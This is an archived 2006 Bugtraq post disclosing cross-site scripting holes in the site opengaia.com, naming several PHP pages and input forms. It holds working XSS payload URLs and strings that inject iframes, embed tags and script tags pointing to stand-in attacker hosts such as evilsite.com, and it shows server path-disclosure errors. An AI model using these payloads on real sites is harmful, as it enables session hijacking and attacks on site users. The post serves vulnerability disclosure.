lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060611055138.7401.qmail@securityfocus.com>
Date: 11 Jun 2006 05:51:38 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Opengaia.com - XSS Vuln & Session Include


Opengaia.com

Homepage:
http://www.opengaia.com

Effected files:
my_page.php
module.php
editing your profile
the search input box
adding a diary/blog

------------------------------------

Just like in onlinenode.com's vulnerabilities, it seems this site filters data just about the same. Below is one way to create a XSS vuln by closing quotes and using an open ended iframe.

http://www.opengaia.com/my_page.php?viewed_id=6871">'>'><iframe%20src=http://evilsite.com/scriptlet.html%20<<BR><BR>&langue=en&PHPSESSID=538f9354d24325a0bf3b293ddb469274

<embed> tags also workin each .php file. Example:

http://www.opengaia.com/my_page.php?viewed_id=6871''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<"">


Module.php XSS Vuln:

It seems with this code, we'll get a php error with full path disclosure and the xss won't work:

http://www.opengaia.com/modele.php?connection=1&name=%27%27%22%3C%22%27%3E%3Ciframe%2520src%3Dhttp%3A%2F%2Fevilsite.com%2Fscriptlet.html%2520%3C%5C

Warning: main(./): failed to open stream: Success in /home/user/public_html/modele.php on line 243

Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 243

Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/encoree/public_html/modele.php on line 243

Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247

Warning: main(./): failed to open stream: Permission denied in /home/user/public_html/modele.php on line 247

Warning: main(): Failed opening './' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/user/

public_html/modele.php on line 247

modele.php XSS Vuln using iframe tag:

http://www.opengaia.com/modele.php?connection=1&name=%22%3E%27%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%22&password=&object_menu=&right=accueil.php&left=bienvenue.php&page=home&viewed_id=&fond=cccccc&langue=en&object_type=&filtre=

-------------------------------------

Editing your profile XSS with PHP Session included:

It seems the input boxes of editing your profile don't properlly filter user input before generating it. For a PoC example 

we will use end tags and put <script> tags to bypass this filter:

'>"><""><SCRIPT SRC=http://www.youfucktard.com/xss.js></SCRIPT><"<"">

Screenshots of PoC in action:

http://www.youfucktard.com/xsp/gaia2.jpg
http://www.youfucktard.com/xsp/gaia3.jpg
http://www.youfucktard.com/xsp/gaia3.jpg

-----------------------------------

Search input box XSS Vuln PoC:

in the search boxtry putting:
<iframe src=http://www.evilsite.com/scriptlet.html <

---------------------------------

Data isn't properly filtered when adding a diary/blog as well. for PoC try putting:

<iframe src=http://evilsite.com/scriptlet.html <


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ